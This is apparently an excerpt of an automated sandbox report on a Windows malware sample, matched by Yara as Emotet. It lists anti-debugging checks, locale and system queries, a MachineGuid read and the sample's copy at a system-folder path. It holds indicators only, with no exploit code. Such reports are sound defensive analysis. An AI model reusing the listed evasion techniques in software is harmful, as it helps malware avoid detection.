Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_021D4DF0 mov eax, dword ptr fs:[00000030h] 0_2_021D4DF0
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_02185A6E mov eax, dword ptr fs:[00000030h] 0_2_02185A6E
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_0218095E mov eax, dword ptr fs:[00000030h] 0_2_0218095E
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_0218698E mov eax, dword ptr fs:[00000030h] 0_2_0218698E
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_02180456 mov eax, dword ptr fs:[00000030h] 0_2_02180456
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_021A1030 mov eax, dword ptr fs:[00000030h] 0_2_021A1030
Source: C:\Windows\SysWOW64\mstsc\winusb.exe Code function: 1_2_02213ED0 mov eax, dword ptr fs:[00000030h] 1_2_02213ED0
Source: C:\Windows\SysWOW64\mstsc\winusb.exe Code function: 1_2_02214DF0 mov eax, dword ptr fs:[00000030h] 1_2_02214DF0
Source: C:\Windows\SysWOW64\mstsc\winusb.exe Code function: 1_2_021E1030 mov eax, dword ptr fs:[00000030h] 1_2_021E1030
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_021D3070 PathFindExtensionW,GetProcessHeap,RtlAllocateHeap,RtlAllocateHeap, 0_2_021D3070
Program does not show much activity (idle)
Source: all processes Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_0041D41B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_0041D41B
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_00423ABF __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00423ABF
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_00427CBF SetUnhandledExceptionFilter, 0_2_00427CBF
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_00420FD7 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00420FD7
Source: C:\Windows\SysWOW64\mstsc\winusb.exe Code function: 1_2_0041D41B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 1_2_0041D41B
Source: C:\Windows\SysWOW64\mstsc\winusb.exe Code function: 1_2_00423ABF __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_00423ABF
Source: C:\Windows\SysWOW64\mstsc\winusb.exe Code function: 1_2_00427CBF SetUnhandledExceptionFilter, 1_2_00427CBF
Source: C:\Windows\SysWOW64\mstsc\winusb.exe Code function: 1_2_00420FD7 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 1_2_00420FD7
Source: winusb.exe, 00000001.00000002.914708942.0000000000D50000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: winusb.exe, 00000001.00000002.914708942.0000000000D50000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: winusb.exe, 00000001.00000002.914708942.0000000000D50000.00000002.00000001.sdmp Binary or memory string: Progman
Source: winusb.exe, 00000001.00000002.914708942.0000000000D50000.00000002.00000001.sdmp Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA, 0_2_0042B03C
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,_ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itoa_s, 0_2_0042B0DF
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA, 0_2_0042B0A3
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement, 0_2_0042A218
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: _LocaleUpdate::_LocaleUpdate,GetLocaleInfoW, 0_2_004293CB
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: _strcpy_s,GetLocaleInfoA,__snwprintf_s,LoadLibraryA, 0_2_0040E399
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,InterlockedDecrement,InterlockedDecrement, 0_2_0042A470
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLastError,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,GetLocaleInfoA, 0_2_0042941F
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat, 0_2_0042955E
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,InterlockedDecrement,InterlockedDecrement, 0_2_0042A736
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: GetLocaleInfoA, 0_2_0042CAD3
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,__invoke_watson,___crtGetLocaleInfoW, 0_2_00423BF7
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: GetLocaleInfoA,GetLocaleInfoA,GetACP, 0_2_0042AB86
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo, 0_2_00429BAA
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: __getptd,_LcidFromHexString,GetLocaleInfoA, 0_2_0042AC9D
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: GetLocaleInfoA,_LcidFromHexString,_GetPrimaryLen,_strlen, 0_2_0042AD35
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage, 0_2_0042ADA9
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: GetLocaleInfoA,_LocaleUpdate::_LocaleUpdate,___ascii_strnicmp,__tolower_l,__tolower_l, 0_2_0042CE30
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage, 0_2_0042AF7B
Source: C:\Windows\SysWOW64\mstsc\winusb.exe Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA, 1_2_0042B03C
Source: C:\Windows\SysWOW64\mstsc\winusb.exe Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,_ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itoa_s, 1_2_0042B0DF
Source: C:\Windows\SysWOW64\mstsc\winusb.exe Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA, 1_2_0042B0A3
Source: C:\Windows\SysWOW64\mstsc\winusb.exe Code function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement, 1_2_0042A218
Source: C:\Windows\SysWOW64\mstsc\winusb.exe Code function: _LocaleUpdate::_LocaleUpdate,GetLocaleInfoW, 1_2_004293CB
Source: C:\Windows\SysWOW64\mstsc\winusb.exe Code function: _strcpy_s,GetLocaleInfoA,__snwprintf_s,LoadLibraryA, 1_2_0040E399
Source: C:\Windows\SysWOW64\mstsc\winusb.exe Code function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,InterlockedDecrement,InterlockedDecrement, 1_2_0042A470
Source: C:\Windows\SysWOW64\mstsc\winusb.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLastError,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,GetLocaleInfoA, 1_2_0042941F
Source: C:\Windows\SysWOW64\mstsc\winusb.exe Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat, 1_2_0042955E
Source: C:\Windows\SysWOW64\mstsc\winusb.exe Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,InterlockedDecrement,InterlockedDecrement, 1_2_0042A736
Source: C:\Windows\SysWOW64\mstsc\winusb.exe Code function: GetLocaleInfoA, 1_2_0042CAD3
Source: C:\Windows\SysWOW64\mstsc\winusb.exe Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,__invoke_watson,___crtGetLocaleInfoW, 1_2_00423BF7
Source: C:\Windows\SysWOW64\mstsc\winusb.exe Code function: GetLocaleInfoA,GetLocaleInfoA,GetACP, 1_2_0042AB86
Source: C:\Windows\SysWOW64\mstsc\winusb.exe Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo, 1_2_00429BAA
Source: C:\Windows\SysWOW64\mstsc\winusb.exe Code function: __getptd,_LcidFromHexString,GetLocaleInfoA, 1_2_0042AC9D
Source: C:\Windows\SysWOW64\mstsc\winusb.exe Code function: GetLocaleInfoA,_LcidFromHexString,_GetPrimaryLen,_strlen, 1_2_0042AD35
Source: C:\Windows\SysWOW64\mstsc\winusb.exe Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage, 1_2_0042ADA9
Source: C:\Windows\SysWOW64\mstsc\winusb.exe Code function: GetLocaleInfoA,_LocaleUpdate::_LocaleUpdate,___ascii_strnicmp,__tolower_l,__tolower_l, 1_2_0042CE30
Source: C:\Windows\SysWOW64\mstsc\winusb.exe Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage, 1_2_0042AF7B
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\SysWOW64\mstsc\winusb.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_00428596 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter, 0_2_00428596
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_00410DC4 _memset,GetVersionExA, 0_2_00410DC4
Source: C:\Windows\SysWOW64\mstsc\winusb.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected Emotet
Source: Yara match File source: 00000000.00000002.648301312.0000000002180000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.914566076.0000000000650000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.648328999.00000000021A4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.914790785.00000000021E4000.00000004.00000001.sdmp, type: MEMORY